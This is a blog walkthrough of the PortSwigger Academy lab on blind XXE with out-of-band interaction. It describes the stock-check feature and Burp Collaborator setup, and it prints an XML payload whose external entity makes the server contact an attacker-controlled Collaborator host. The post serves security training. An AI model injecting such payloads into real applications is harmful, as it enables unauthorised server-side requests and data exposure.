Blind XXE with out-of-band interaction
In this post we will walk step by step through how to solve Blind XXE with out-of-band interaction on PortSwigger Academy. This lab’s difficulty is practitioner and it is the first lab in the XXE injection labs on Portswigger.
Link to lab: https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction
To solve the lab, use an external entity to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator.
To start the lab click the ‘Access the Lab’ button. A modern browser and Professional Edition is what we need to solve this lab because we need Burp Collaborator.
As we begin the lab we encounter a shop page showcasing different products. It’s worth noting that the products may differ from the screenshot as PortSwigger Labs can vary the content with each lab session. So, don’t worry if your products look different.
Clicking on one of the products we can see a image of the product, a description, and the ability to check Stock based off of location.
Clicking the Check stock button returns a value indicating the number of units.
In the Settings section we can make sure we are using the default Collaborator server. We need this to be set in order to complete the lab.
We will leverage the same payload structure from the first two XXE Injection labs.
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE Payload [ <!ENTITY xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"> ]> <stockCheck> <productId>&xxe;</productId> <storeId>1</storeId> </stockCheck>
The only change we need to worry about is adding the http://BURP-COLLABORATOR-SUBDOMAIN in the DOCTYPE external entity.
In the Collaborator click the Poll now to copy the value of the burp URL.
Our finished payload should resemble this. When we click Send we get the Response “XML parsing error”.
However, we do get hits in our Collaborator.
This is all we needed to do to solve the lab!
That completes the lab! Well done! If you found this helpful, please send me a tweet and tell me what you thought! Feedback is always appreciated!
Jarrod